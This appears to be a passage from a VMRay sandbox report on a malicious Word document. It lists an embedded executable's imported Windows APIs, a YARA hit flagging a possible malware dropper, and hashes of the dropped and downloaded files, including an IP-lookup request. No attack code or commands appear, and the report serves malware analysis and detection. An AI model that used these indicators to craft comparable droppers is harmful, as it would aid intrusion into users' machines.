RealizePalette - 0x4963b8 0x963b8 0x933b8 0x0
Polyline - 0x4963bc 0x963bc 0x933bc 0x0
Polygon - 0x4963c0 0x963c0 0x933c0 0x0
PlayEnhMetaFile - 0x4963c4 0x963c4 0x933c4 0x0
PatBlt - 0x4963c8 0x963c8 0x933c8 0x0
MoveToEx - 0x4963cc 0x963cc 0x933cc 0x0
MaskBlt - 0x4963d0 0x963d0 0x933d0 0x0
LineTo - 0x4963d4 0x963d4 0x933d4 0x0
IntersectClipRect - 0x4963d8 0x963d8 0x933d8 0x0
GetWindowOrgEx - 0x4963dc 0x963dc 0x933dc 0x0
GetWinMetaFileBits - 0x4963e0 0x963e0 0x933e0 0x0
GetTextMetricsA - 0x4963e4 0x963e4 0x933e4 0x0
GetTextExtentPointA - 0x4963e8 0x963e8 0x933e8 0x0
GetTextExtentPoint32A - 0x4963ec 0x963ec 0x933ec 0x0
GetSystemPaletteEntries - 0x4963f0 0x963f0 0x933f0 0x0
GetStockObject - 0x4963f4 0x963f4 0x933f4 0x0
GetPixel - 0x4963f8 0x963f8 0x933f8 0x0
GetPaletteEntries - 0x4963fc 0x963fc 0x933fc 0x0
GetObjectA - 0x496400 0x96400 0x93400 0x0
GetEnhMetaFilePaletteEntries - 0x496404 0x96404 0x93404 0x0
GetEnhMetaFileHeader - 0x496408 0x96408 0x93408 0x0
GetEnhMetaFileBits - 0x49640c 0x9640c 0x9340c 0x0
GetEnhMetaFileW - 0x496410 0x96410 0x93410 0x0
GetDeviceCaps - 0x496414 0x96414 0x93414 0x0
GetDIBits - 0x496418 0x96418 0x93418 0x0
GetDIBColorTable - 0x49641c 0x9641c 0x9341c 0x0
GetDCOrgEx - 0x496420 0x96420 0x93420 0x0
GetCurrentPositionEx - 0x496424 0x96424 0x93424 0x0
GetClipBox - 0x496428 0x96428 0x93428 0x0
GetBrushOrgEx - 0x49642c 0x9642c 0x9342c 0x0
GetBitmapBits - 0x496430 0x96430 0x93430 0x0
GdiFlush - 0x496434 0x96434 0x93434 0x0
ExcludeClipRect - 0x496438 0x96438 0x93438 0x0
DeleteObject - 0x49643c 0x9643c 0x9343c 0x0
DeleteEnhMetaFile - 0x496440 0x96440 0x93440 0x0
DeleteDC - 0x496444 0x96444 0x93444 0x0
CreateSolidBrush - 0x496448 0x96448 0x93448 0x0
CreatePenIndirect - 0x49644c 0x9644c 0x9344c 0x0
CreatePalette - 0x496450 0x96450 0x93450 0x0
CreateHalftonePalette - 0x496454 0x96454 0x93454 0x0
CreateFontIndirectA - 0x496458 0x96458 0x93458 0x0
CreateDIBitmap - 0x49645c 0x9645c 0x9345c 0x0
CreateDIBSection - 0x496460 0x96460 0x93460 0x0
CreateCompatibleDC - 0x496464 0x96464 0x93464 0x0
CreateCompatibleBitmap - 0x496468 0x96468 0x93468 0x0
CreateBrushIndirect - 0x49646c 0x9646c 0x9346c 0x0
CreateBitmap - 0x496470 0x96470 0x93470 0x0
CopyEnhMetaFileA - 0x496474 0x96474 0x93474 0x0
BitBlt - 0x496478 0x96478 0x93478 0x0
AddFontResourceA - 0x49647c 0x9647c 0x9347c 0x0
user32.dll (168)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateWindowExA - 0x496484 0x96484 0x93484 0x0
WindowFromPoint - 0x496488 0x96488 0x93488 0x0
WinHelpA - 0x49648c 0x9648c 0x9348c 0x0
WaitMessage - 0x496490 0x96490 0x93490 0x0
UpdateWindow - 0x496494 0x96494 0x93494 0x0
UnregisterClassA - 0x496498 0x96498 0x93498 0x0
UnhookWindowsHookEx - 0x49649c 0x9649c 0x9349c 0x0
TranslateMessage - 0x4964a0 0x964a0 0x934a0 0x0
TranslateMDISysAccel - 0x4964a4 0x964a4 0x934a4 0x0
TrackPopupMenu - 0x4964a8 0x964a8 0x934a8 0x0
SystemParametersInfoA - 0x4964ac 0x964ac 0x934ac 0x0
ShowWindow - 0x4964b0 0x964b0 0x934b0 0x0
ShowScrollBar - 0x4964b4 0x964b4 0x934b4 0x0
ShowOwnedPopups - 0x4964b8 0x964b8 0x934b8 0x0
ShowCursor - 0x4964bc 0x964bc 0x934bc 0x0
ShowCaret - 0x4964c0 0x964c0 0x934c0 0x0
SetWindowsHookExA - 0x4964c4 0x964c4 0x934c4 0x0
SetWindowTextA - 0x4964c8 0x964c8 0x934c8 0x0
SetWindowPos - 0x4964cc 0x964cc 0x934cc 0x0
SetWindowPlacement - 0x4964d0 0x964d0 0x934d0 0x0
SetWindowLongA - 0x4964d4 0x964d4 0x934d4 0x0
SetTimer - 0x4964d8 0x964d8 0x934d8 0x0
SetScrollRange - 0x4964dc 0x964dc 0x934dc 0x0
SetScrollPos - 0x4964e0 0x964e0 0x934e0 0x0
SetScrollInfo - 0x4964e4 0x964e4 0x934e4 0x0
SetRect - 0x4964e8 0x964e8 0x934e8 0x0
SetPropA - 0x4964ec 0x964ec 0x934ec 0x0
SetParent - 0x4964f0 0x964f0 0x934f0 0x0
SetMenuItemInfoA - 0x4964f4 0x964f4 0x934f4 0x0
SetMenu - 0x4964f8 0x964f8 0x934f8 0x0
SetForegroundWindow - 0x4964fc 0x964fc 0x934fc 0x0
SetFocus - 0x496500 0x96500 0x93500 0x0
SetCursor - 0x496504 0x96504 0x93504 0x0
SetClipboardData - 0x496508 0x96508 0x93508 0x0
SetClassLongA - 0x49650c 0x9650c 0x9350c 0x0
SetCapture - 0x496510 0x96510 0x93510 0x0
SetActiveWindow - 0x496514 0x96514 0x93514 0x0
SendMessageA - 0x496518 0x96518 0x93518 0x0
ScrollWindow - 0x49651c 0x9651c 0x9351c 0x0
ScreenToClient - 0x496520 0x96520 0x93520 0x0
RemovePropA - 0x496524 0x96524 0x93524 0x0
RemoveMenu - 0x496528 0x96528 0x93528 0x0
ReleaseDC - 0x49652c 0x9652c 0x9352c 0x0
ReleaseCapture - 0x496530 0x96530 0x93530 0x0
RegisterWindowMessageA - 0x496534 0x96534 0x93534 0x0
RegisterClipboardFormatA - 0x496538 0x96538 0x93538 0x0
RegisterClassA - 0x49653c 0x9653c 0x9353c 0x0
RedrawWindow - 0x496540 0x96540 0x93540 0x0
PtInRect - 0x496544 0x96544 0x93544 0x0
PostQuitMessage - 0x496548 0x96548 0x93548 0x0
PostMessageA - 0x49654c 0x9654c 0x9354c 0x0
PeekMessageA - 0x496550 0x96550 0x93550 0x0
OpenClipboard - 0x496554 0x96554 0x93554 0x0
OffsetRect - 0x496558 0x96558 0x93558 0x0
OemToCharA - 0x49655c 0x9655c 0x9355c 0x0
MessageBoxA - 0x496560 0x96560 0x93560 0x0
MessageBeep - 0x496564 0x96564 0x93564 0x0
MapWindowPoints - 0x496568 0x96568 0x93568 0x0
MapVirtualKeyA - 0x49656c 0x9656c 0x9356c 0x0
LoadStringA - 0x496570 0x96570 0x93570 0x0
LoadKeyboardLayoutA - 0x496574 0x96574 0x93574 0x0
LoadIconA - 0x496578 0x96578 0x93578 0x0
LoadCursorW - 0x49657c 0x9657c 0x9357c 0x0
LoadCursorA - 0x496580 0x96580 0x93580 0x0
LoadBitmapA - 0x496584 0x96584 0x93584 0x0
KillTimer - 0x496588 0x96588 0x93588 0x0
IsZoomed - 0x49658c 0x9658c 0x9358c 0x0
IsWindowVisible - 0x496590 0x96590 0x93590 0x0
IsWindowEnabled - 0x496594 0x96594 0x93594 0x0
IsWindow - 0x496598 0x96598 0x93598 0x0
IsRectEmpty - 0x49659c 0x9659c 0x9359c 0x0
IsIconic - 0x4965a0 0x965a0 0x935a0 0x0
IsDialogMessageA - 0x4965a4 0x965a4 0x935a4 0x0
IsChild - 0x4965a8 0x965a8 0x935a8 0x0
InvalidateRect - 0x4965ac 0x965ac 0x935ac 0x0
IntersectRect - 0x4965b0 0x965b0 0x935b0 0x0
InsertMenuItemA - 0x4965b4 0x965b4 0x935b4 0x0
InsertMenuA - 0x4965b8 0x965b8 0x935b8 0x0
InflateRect - 0x4965bc 0x965bc 0x935bc 0x0
HideCaret - 0x4965c0 0x965c0 0x935c0 0x0
GetWindowThreadProcessId - 0x4965c4 0x965c4 0x935c4 0x0
GetWindowTextA - 0x4965c8 0x965c8 0x935c8 0x0
GetWindowRect - 0x4965cc 0x965cc 0x935cc 0x0
GetWindowPlacement - 0x4965d0 0x965d0 0x935d0 0x0
GetWindowLongA - 0x4965d4 0x965d4 0x935d4 0x0
GetWindowDC - 0x4965d8 0x965d8 0x935d8 0x0
GetTopWindow - 0x4965dc 0x965dc 0x935dc 0x0
GetSystemMetrics - 0x4965e0 0x965e0 0x935e0 0x0
GetSystemMenu - 0x4965e4 0x965e4 0x935e4 0x0
GetSysColorBrush - 0x4965e8 0x965e8 0x935e8 0x0
GetSysColor - 0x4965ec 0x965ec 0x935ec 0x0
GetSubMenu - 0x4965f0 0x965f0 0x935f0 0x0
GetScrollRange - 0x4965f4 0x965f4 0x935f4 0x0
GetScrollPos - 0x4965f8 0x965f8 0x935f8 0x0
GetScrollInfo - 0x4965fc 0x965fc 0x935fc 0x0
GetPropA - 0x496600 0x96600 0x93600 0x0
GetParent - 0x496604 0x96604 0x93604 0x0
GetWindow - 0x496608 0x96608 0x93608 0x0
GetMenuStringA - 0x49660c 0x9660c 0x9360c 0x0
GetMenuState - 0x496610 0x96610 0x93610 0x0
GetMenuItemInfoA - 0x496614 0x96614 0x93614 0x0
GetMenuItemID - 0x496618 0x96618 0x93618 0x0
GetMenuItemCount - 0x49661c 0x9661c 0x9361c 0x0
GetMenu - 0x496620 0x96620 0x93620 0x0
GetLastActivePopup - 0x496624 0x96624 0x93624 0x0
GetKeyboardState - 0x496628 0x96628 0x93628 0x0
GetKeyboardLayoutList - 0x49662c 0x9662c 0x9362c 0x0
GetKeyboardLayout - 0x496630 0x96630 0x93630 0x0
GetKeyState - 0x496634 0x96634 0x93634 0x0
GetKeyNameTextA - 0x496638 0x96638 0x93638 0x0
GetIconInfo - 0x49663c 0x9663c 0x9363c 0x0
GetForegroundWindow - 0x496640 0x96640 0x93640 0x0
GetFocus - 0x496644 0x96644 0x93644 0x0
GetDesktopWindow - 0x496648 0x96648 0x93648 0x0
GetDCEx - 0x49664c 0x9664c 0x9364c 0x0
GetDC - 0x496650 0x96650 0x93650 0x0
GetCursorPos - 0x496654 0x96654 0x93654 0x0
GetCursor - 0x496658 0x96658 0x93658 0x0
GetClipboardData - 0x49665c 0x9665c 0x9365c 0x0
GetClientRect - 0x496660 0x96660 0x93660 0x0
GetClassNameA - 0x496664 0x96664 0x93664 0x0
GetClassInfoA - 0x496668 0x96668 0x93668 0x0
GetCapture - 0x49666c 0x9666c 0x9366c 0x0
GetAsyncKeyState - 0x496670 0x96670 0x93670 0x0
GetActiveWindow - 0x496674 0x96674 0x93674 0x0
FrameRect - 0x496678 0x96678 0x93678 0x0
FindWindowA - 0x49667c 0x9667c 0x9367c 0x0
FillRect - 0x496680 0x96680 0x93680 0x0
EqualRect - 0x496684 0x96684 0x93684 0x0
EnumWindows - 0x496688 0x96688 0x93688 0x0
EnumThreadWindows - 0x49668c 0x9668c 0x9368c 0x0
EndPaint - 0x496690 0x96690 0x93690 0x0
EnableWindow - 0x496694 0x96694 0x93694 0x0
EnableScrollBar - 0x496698 0x96698 0x93698 0x0
EnableMenuItem - 0x49669c 0x9669c 0x9369c 0x0
EmptyClipboard - 0x4966a0 0x966a0 0x936a0 0x0
DrawTextA - 0x4966a4 0x966a4 0x936a4 0x0
DrawStateA - 0x4966a8 0x966a8 0x936a8 0x0
DrawMenuBar - 0x4966ac 0x966ac 0x936ac 0x0
DrawIconEx - 0x4966b0 0x966b0 0x936b0 0x0
DrawIcon - 0x4966b4 0x966b4 0x936b4 0x0
DrawFrameControl - 0x4966b8 0x966b8 0x936b8 0x0
DrawEdge - 0x4966bc 0x966bc 0x936bc 0x0
DispatchMessageA - 0x4966c0 0x966c0 0x936c0 0x0
DestroyWindow - 0x4966c4 0x966c4 0x936c4 0x0
DestroyMenu - 0x4966c8 0x966c8 0x936c8 0x0
DestroyIcon - 0x4966cc 0x966cc 0x936cc 0x0
DestroyCursor - 0x4966d0 0x966d0 0x936d0 0x0
DeleteMenu - 0x4966d4 0x966d4 0x936d4 0x0
DefWindowProcA - 0x4966d8 0x966d8 0x936d8 0x0
DefMDIChildProcA - 0x4966dc 0x966dc 0x936dc 0x0
DefFrameProcA - 0x4966e0 0x966e0 0x936e0 0x0
CreatePopupMenu - 0x4966e4 0x966e4 0x936e4 0x0
CreateMenu - 0x4966e8 0x966e8 0x936e8 0x0
CreateIcon - 0x4966ec 0x966ec 0x936ec 0x0
CloseClipboard - 0x4966f0 0x966f0 0x936f0 0x0
ClientToScreen - 0x4966f4 0x966f4 0x936f4 0x0
CheckMenuItem - 0x4966f8 0x966f8 0x936f8 0x0
CallWindowProcA - 0x4966fc 0x966fc 0x936fc 0x0
CallNextHookEx - 0x496700 0x96700 0x93700 0x0
BeginPaint - 0x496704 0x96704 0x93704 0x0
CharNextA - 0x496708 0x96708 0x93708 0x0
CharLowerBuffA - 0x49670c 0x9670c 0x9370c 0x0
CharLowerA - 0x496710 0x96710 0x93710 0x0
CharUpperBuffA - 0x496714 0x96714 0x93714 0x0
CharToOemA - 0x496718 0x96718 0x93718 0x0
AdjustWindowRectEx - 0x49671c 0x9671c 0x9371c 0x0
ActivateKeyboardLayout - 0x496720 0x96720 0x93720 0x0
kernel32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Sleep - 0x496728 0x96728 0x93728 0x0
oleaut32.dll (13)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SafeArrayPtrOfIndex - 0x496730 0x96730 0x93730 0x0
SafeArrayPutElement - 0x496734 0x96734 0x93734 0x0
SafeArrayGetElement - 0x496738 0x96738 0x93738 0x0
SafeArrayUnaccessData - 0x49673c 0x9673c 0x9373c 0x0
SafeArrayAccessData - 0x496740 0x96740 0x93740 0x0
SafeArrayGetUBound - 0x496744 0x96744 0x93744 0x0
SafeArrayGetLBound - 0x496748 0x96748 0x93748 0x0
SafeArrayCreate - 0x49674c 0x9674c 0x9374c 0x0
VariantChangeType - 0x496750 0x96750 0x93750 0x0
VariantCopyInd - 0x496754 0x96754 0x93754 0x0
VariantCopy - 0x496758 0x96758 0x93758 0x0
VariantClear - 0x49675c 0x9675c 0x9375c 0x0
VariantInit - 0x496760 0x96760 0x93760 0x0
ole32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoTaskMemAlloc - 0x496768 0x96768 0x93768 0x0
CoCreateInstance - 0x49676c 0x9676c 0x9376c 0x0
CoUninitialize - 0x496770 0x96770 0x93770 0x0
CoInitialize - 0x496774 0x96774 0x93774 0x0
oleaut32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateErrorInfo - 0x49677c 0x9677c 0x9377c 0x0
GetErrorInfo - 0x496780 0x96780 0x93780 0x0
SetErrorInfo - 0x496784 0x96784 0x93784 0x0
SysFreeString - 0x496788 0x96788 0x93788 0x0
comctl32.dll (24)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ImageList_SetIconSize - 0x496790 0x96790 0x93790 0x0
ImageList_GetIconSize - 0x496794 0x96794 0x93794 0x0
ImageList_Write - 0x496798 0x96798 0x93798 0x0
ImageList_Read - 0x49679c 0x9679c 0x9379c 0x0
ImageList_GetDragImage - 0x4967a0 0x967a0 0x937a0 0x0
ImageList_DragShowNolock - 0x4967a4 0x967a4 0x937a4 0x0
ImageList_SetDragCursorImage - 0x4967a8 0x967a8 0x937a8 0x0
ImageList_DragMove - 0x4967ac 0x967ac 0x937ac 0x0
ImageList_DragLeave - 0x4967b0 0x967b0 0x937b0 0x0
ImageList_DragEnter - 0x4967b4 0x967b4 0x937b4 0x0
ImageList_EndDrag - 0x4967b8 0x967b8 0x937b8 0x0
ImageList_BeginDrag - 0x4967bc 0x967bc 0x937bc 0x0
ImageList_Remove - 0x4967c0 0x967c0 0x937c0 0x0
ImageList_DrawEx - 0x4967c4 0x967c4 0x937c4 0x0
ImageList_Replace - 0x4967c8 0x967c8 0x937c8 0x0
ImageList_Draw - 0x4967cc 0x967cc 0x937cc 0x0
ImageList_GetBkColor - 0x4967d0 0x967d0 0x937d0 0x0
ImageList_SetBkColor - 0x4967d4 0x967d4 0x937d4 0x0
ImageList_ReplaceIcon - 0x4967d8 0x967d8 0x937d8 0x0
ImageList_Add - 0x4967dc 0x967dc 0x937dc 0x0
ImageList_GetImageCount - 0x4967e0 0x967e0 0x937e0 0x0
ImageList_Destroy - 0x4967e4 0x967e4 0x937e4 0x0
ImageList_Create - 0x4967e8 0x967e8 0x937e8 0x0
InitCommonControls - 0x4967ec 0x967ec 0x937ec 0x0
winmm.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
sndPlaySoundA - 0x4967f4 0x967f4 0x937f4 0x0
YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
Document_Contains_Embedded_PE_File PE file inside a document; possible malware dropper -
3/5
...
c:\users\keecfmwgj\appdata\local\gdipfontcachev1.dat Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 8.03 KB
MD5 3b124f39977734e519b4d76da3fd1429 Copy to Clipboard
SHA1 93258edf50199af514b466e27af94b44f9eee8a7 Copy to Clipboard
SHA256 790a6af00576b6ee07663cf571a92e5b72379c9d24f3599af1fa9fec8aeb168a Copy to Clipboard
SSDeep 3:5tmlNlPlcy:5tm/ Copy to Clipboard
ImpHash -
c:\netlogon Dropped File Unknown
clean
...
  • Actions
»
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\gdipfontcachev1.dat Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 108.45 KB
MD5 f7bdd5d34bc87760ee6515dced6538b1 Copy to Clipboard
SHA1 77264ff34c95f5c9ab97568e9c0a5b48b84787cb Copy to Clipboard
SHA256 9f0327fb7d2b24169685dc794022dcb42f351a2c277c0c6360810c268196ac67 Copy to Clipboard
SSDeep 1536:DPmuvYHgTlll9+byxrgoEviK4uf3xqOYZ:bmCl9+mxrA9sOY Copy to Clipboard
ImpHash -
C:\ProgramData\kaosdma.txt Downloaded File Text
clean
...
»
Also Known As c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\api_ipify_org[1].txt (Downloaded File)
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 5f61ad2e35e8d07aacb241664824725e Copy to Clipboard
SHA1 610a4f50b05d5f664c5cc47b6b3b86ca6cb4ced1 Copy to Clipboard
SHA256 fd41cd2f48623ceb8d6d4fa774c80efa5c3f22c94bfd7a7c59543772b585d9a1 Copy to Clipboard
SSDeep 3:gRtWu:g73 Copy to Clipboard
ImpHash -
0f0408e2350bcecbe61c16cb9f083f1db2cca75be4e5f5b00be7aba408407662 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 121 Bytes
MD5 3eea1302b226620ee1f985831c585d1a Copy to Clipboard
SHA1 9d88d1c51627c98800617bd6e51375dfba2e9991 Copy to Clipboard
SHA256 0f0408e2350bcecbe61c16cb9f083f1db2cca75be4e5f5b00be7aba408407662 Copy to Clipboard
SSDeep 3:RwQWcCMEmDXcVULrjqYlFx63Fq3jM89xYu7WM61dUD/r+WM:nWBM9cVXiA+w8T17z6jag Copy to Clipboard
ImpHash -
ca6b8165af0d6032dabc2a818b5c08eeca3d29ed612e0deb88a64e58bae47a86 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 52 Bytes
MD5 03970f4ee8f2d09b01179674d140ea5f Copy to Clipboard
SHA1 9b6ba03f44bc470a7c22f705269b0a6e4efc8486 Copy to Clipboard
SHA256 ca6b8165af0d6032dabc2a818b5c08eeca3d29ed612e0deb88a64e58bae47a86 Copy to Clipboard
SSDeep 3:1UNsRdOOLmpS0tQOkSGYn:1UiOOS80tPbGY Copy to Clipboard
ImpHash -
8bc8e15ebd0428201a59b41612a9da6284ace3847cae6d0711a23a176c11cbf1 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 56543620b2894e9e0143b98a00af4f6e Copy to Clipboard
SHA1 a194582bc819c176962749e1174a9a97f3a8238f Copy to Clipboard
SHA256 8bc8e15ebd0428201a59b41612a9da6284ace3847cae6d0711a23a176c11cbf1 Copy to Clipboard
SSDeep 3:9/+UnS1:9/ZM Copy to Clipboard
ImpHash -
dbf3eff77c45528798443b7335e45ae229f3036db4081551e1cf8456a074ac72 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 61b3b975dedabc8c6558eb27196b70f7 Copy to Clipboard
SHA1 32fed066ac9a139e4a16979d4ebbc0e5aef1d2e0 Copy to Clipboard
SHA256 dbf3eff77c45528798443b7335e45ae229f3036db4081551e1cf8456a074ac72 Copy to Clipboard
SSDeep 3:gHd1:gz Copy to Clipboard
ImpHash -
fdf73d5b987ef1e4a58ecee1e654161ecac8dc2f61d6f9f4fd3d17dd838ca89a Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 ebd55966c93202038455fc78b710f5e9 Copy to Clipboard
SHA1 8b4ee82ce292ab294d2cf15ebf3bcbe7f1474da4 Copy to Clipboard
SHA256 fdf73d5b987ef1e4a58ecee1e654161ecac8dc2f61d6f9f4fd3d17dd838ca89a Copy to Clipboard
SSDeep 3:I3kS1:KkM Copy to Clipboard
ImpHash -
bc8b832fd2a68c177d4f5ecee42000ae6255a8445a53c6f1a4d3817226df73a2 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 d50283f0de76717feacd6d796a2fc5cc Copy to Clipboard
SHA1 94c700fb65c6965a48f253e767a69de615d34153 Copy to Clipboard
SHA256 bc8b832fd2a68c177d4f5ecee42000ae6255a8445a53c6f1a4d3817226df73a2 Copy to Clipboard
SSDeep 3:+OM:E Copy to Clipboard
ImpHash -
a9f28f5c27f1d7a35858036a7775bec833b424362ebe7b630168cd096f9b1a60 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 c18225e887620261d030e03f1b24e45e Copy to Clipboard
SHA1 2e1b7915bb56884f6e5508e9e5377c014672915f Copy to Clipboard
SHA256 a9f28f5c27f1d7a35858036a7775bec833b424362ebe7b630168cd096f9b1a60 Copy to Clipboard
SSDeep 3:W33T:CT Copy to Clipboard
ImpHash -
99050ff7c9cd2eeb52103a3ebb1bdbbf2daad4cec2e31f09c397a1a9a93a58c7 Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 c72ea6c3295a5cab90848053e3760b95 Copy to Clipboard
SHA1 909439d196c86d9b0fadcab22da30427c4490a3c Copy to Clipboard
SHA256 99050ff7c9cd2eeb52103a3ebb1bdbbf2daad4cec2e31f09c397a1a9a93a58c7 Copy to Clipboard
SSDeep 3:1n+UnS1:1nZM Copy to Clipboard
ImpHash -
cfa5f5b6696abeb299fa0621b62c56c14aaa2d367a0583933472f007a885874f Downloaded File Text
clean
...
»
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 f589706747a771e7e57badb242b19d5f Copy to Clipboard
SHA1 56f9a642338ce6f887a572d05be3ea8adceda7e2 Copy to Clipboard
SHA256 cfa5f5b6696abeb299fa0621b62c56c14aaa2d367a0583933472f007a885874f Copy to Clipboard
SSDeep 3:+kG:+kG Copy to Clipboard
ImpHash -
0.PNG Embedded File Image
clean
...
»
Parent File C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
MIME Type image/png
File Size 551.13 KB
MD5 5c34c341901cf35b8875d038cd4f6f26 Copy to Clipboard
SHA1 bef7e126da29a0e68e2569a392bb9c0b1e117624 Copy to Clipboard
SHA256 90229e3b878f46a7e4a2b4e89558a450d8e21578b8e57c993e3ad638df532041 Copy to Clipboard
SSDeep 12288:wBGIkqrPfcaphDrGv2YileZ93/seZgDFj+7oUOp7VKs+LBm:wEIjrPUaphvGvGUZ93/semhXp7AsWm Copy to Clipboard
ImpHash -
2.EMF Embedded File Stream
clean
...
»
Parent File C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
MIME Type application/octet-stream
File Size 4.85 KB
MD5 511ef60e1f58994de2f954faece5383f Copy to Clipboard
SHA1 f0e2e52ad5b55758760ea475892ebf3c9085d333 Copy to Clipboard
SHA256 5f9b76346c88e6aa464b68e994dd0f9edd321c40b7937233c589ec8751f4fb97 Copy to Clipboard
SSDeep 48:FUD3hNZtbmsdBg6qjpLkwOEG6kpnydHk7al:mTZtLBFq9gV+EM Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image